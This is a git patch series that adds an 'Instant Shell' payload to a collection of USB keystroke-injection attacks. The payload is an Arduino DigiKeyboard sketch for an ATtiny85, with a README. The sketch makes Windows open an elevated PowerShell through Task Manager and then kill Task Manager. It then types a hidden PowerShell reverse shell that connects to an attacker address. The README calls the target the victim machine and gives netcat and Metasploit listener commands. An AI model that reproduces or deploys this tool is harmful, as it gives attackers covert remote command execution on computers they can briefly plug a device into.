From 00825a3676067ef77fdd4b100f36ec68432f974a Mon Sep 17 00:00:00 2001 From: humanG0D Date: Sun, 10 Oct 2021 13:56:48 +0800 Subject: [PATCH 1/3] hum4ng0d --- payloads/Instant Shell/Instant_Shell.ino | 33 ++++++++++++++++++++++++ payloads/Instant Shell/README.md | 13 ++++++++++ 2 files changed, 46 insertions(+) create mode 100644 payloads/Instant Shell/Instant_Shell.ino create mode 100644 payloads/Instant Shell/README.md diff --git a/payloads/Instant Shell/Instant_Shell.ino b/payloads/Instant Shell/Instant_Shell.ino new file mode 100644 index 0000000..6481d5b --- /dev/null +++ b/payloads/Instant Shell/Instant_Shell.ino @@ -0,0 +1,33 @@ +#include "DigiKeyboard.h" +#define KEY_TAB 0x2b +void setup() { + pinMode(1, OUTPUT); //LED on Model A +} +void loop() { + DigiKeyboard.update(); + DigiKeyboard.sendKeyStroke(0); + DigiKeyboard.delay(3000); + + DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run + DigiKeyboard.delay(500); + DigiKeyboard.println("taskmgr"); //starting taskmgr + DigiKeyboard.delay(5000); + DigiKeyboard.sendKeyStroke(KEY_F, MOD_ALT_LEFT); + DigiKeyboard.sendKeyStroke(KEY_N);//run + DigiKeyboard.delay(2000); + DigiKeyboard.print("powershell -noexit -command \"mode con cols=18 lines=1\"");//start tiny PowerShell + DigiKeyboard.sendKeyStroke(KEY_TAB); + DigiKeyboard.sendKeyStroke(KEY_SPACE);//turn on admin privileges + DigiKeyboard.sendKeyStroke(KEY_ENTER); //run + DigiKeyboard.delay(5000); + DigiKeyboard.println("taskkill /IM \"taskmgr.exe\" /F ");//killing taskmanager + DigiKeyboard.delay(2000); + DigiKeyboard.println("cmd");//run cmd + DigiKeyboard.delay(2000); + DigiKeyboard.println(F("powershell -windowstyle hidden -command \"$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"")); //powershell to attacker + DigiKeyboard.delay(5000); + digitalWrite(1, HIGH); //turn on led when program finishes + DigiKeyboard.delay(90000); + digitalWrite(1, LOW); + DigiKeyboard.delay(5000); +} diff --git a/payloads/Instant Shell/README.md b/payloads/Instant Shell/README.md new file mode 100644 index 0000000..c08889a --- /dev/null +++ b/payloads/Instant Shell/README.md @@ -0,0 +1,13 @@ +# Instant Shell + +### Description: + +#### 1: Install_Shell.ino:
+Starting instant shell to an attacker machine in less than 1 minute.
+ +**Instuctions:**
Start an nc listener or metasploit listener. Be sure to change IP and Port. Depends on your computer, play with the delay.
+ +**Tested on:**
+**OS**: Windows 10|11
+**User**: Admin/Normal User
+**Hardware**: ATtiny85 From 76dcb91f7e316115aba6ebd509f16af42fb17c32 Mon Sep 17 00:00:00 2001 From: humanG0D Date: Sun, 10 Oct 2021 17:29:51 +0800 Subject: [PATCH 2/3] edit --- payloads/Instant Shell/Instant_Shell.ino | 2 +- payloads/Instant Shell/README.md | 17 +++++++++++++++-- 2 files changed, 16 insertions(+), 3 deletions(-) diff --git a/payloads/Instant Shell/Instant_Shell.ino b/payloads/Instant Shell/Instant_Shell.ino index 6481d5b..ec9390d 100644 --- a/payloads/Instant Shell/Instant_Shell.ino +++ b/payloads/Instant Shell/Instant_Shell.ino @@ -24,7 +24,7 @@ void loop() { DigiKeyboard.delay(2000); DigiKeyboard.println("cmd");//run cmd DigiKeyboard.delay(2000); - DigiKeyboard.println(F("powershell -windowstyle hidden -command \"$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"")); //powershell to attacker + DigiKeyboard.println(F("powershell -windowstyle hidden -command \"$client = New-Object System.Net.Sockets.TCPClient('',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"")); //powershell to attacker DigiKeyboard.delay(5000); digitalWrite(1, HIGH); //turn on led when program finishes DigiKeyboard.delay(90000); diff --git a/payloads/Instant Shell/README.md b/payloads/Instant Shell/README.md index c08889a..30f81e4 100644 --- a/payloads/Instant Shell/README.md +++ b/payloads/Instant Shell/README.md @@ -2,10 +2,23 @@ ### Description: -#### 1: Install_Shell.ino:
+#### 1: Instant_Shell.ino:
Starting instant shell to an attacker machine in less than 1 minute.
-**Instuctions:**
Start an nc listener or metasploit listener. Be sure to change IP and Port. Depends on your computer, play with the delay.
+**Payload by:** [hum4nG0D](https://github.com/hum4nG0D/) + +Get instant interactive reverse powershell shell in less than a minute and send commands remotely to victim machine. Interactive reverse Powershell shell script from [Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html) + +**Instructions:** +Start an nc listener or metasploit listener. Be sure to change IP and Port. Adjust script delay which suits best to your computer. + +``` +nc -lvnp 4444 +``` + +``` +msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost ; set lport 4444; set ExitOnSession false; exploit -j" +``` **Tested on:**
**OS**: Windows 10|11
From d2769e60c1bbac7d1cab1b204cb4153a95716d55 Mon Sep 17 00:00:00 2001 From: humanG0D Date: Sun, 10 Oct 2021 18:09:16 +0800 Subject: [PATCH 3/3] Create .DS_Store --- payloads/.DS_Store | Bin 0 -> 6148 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 payloads/.DS_Store diff --git a/payloads/.DS_Store b/payloads/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..b85c13ba91426ba46f623f69db021a7441d6119e GIT binary patch literal 6148 zcmeHKJ5Izf5S@W7A|a$LDSd^#fmwxuIt?W(i`XI|D*?S*Zo)md21noy@a6+bw9z6O zgwTv+zp*_to;)eGhlqIjxLy#=iKs#oWKkwWrYDyU+;|3Ljd4YH^gxLk+Druci&K*O zF`Xmtdt^S$|Aty>+uKER-FMqT>U*razOGkozk+r3{QCZO@$_=KKYrJ*f9SE@>|``Z zF4SNk7zhS}fneZU25@JKR7Zx<2Lr)CF!05IoDT_2Fgq4QJvz{72>_I5v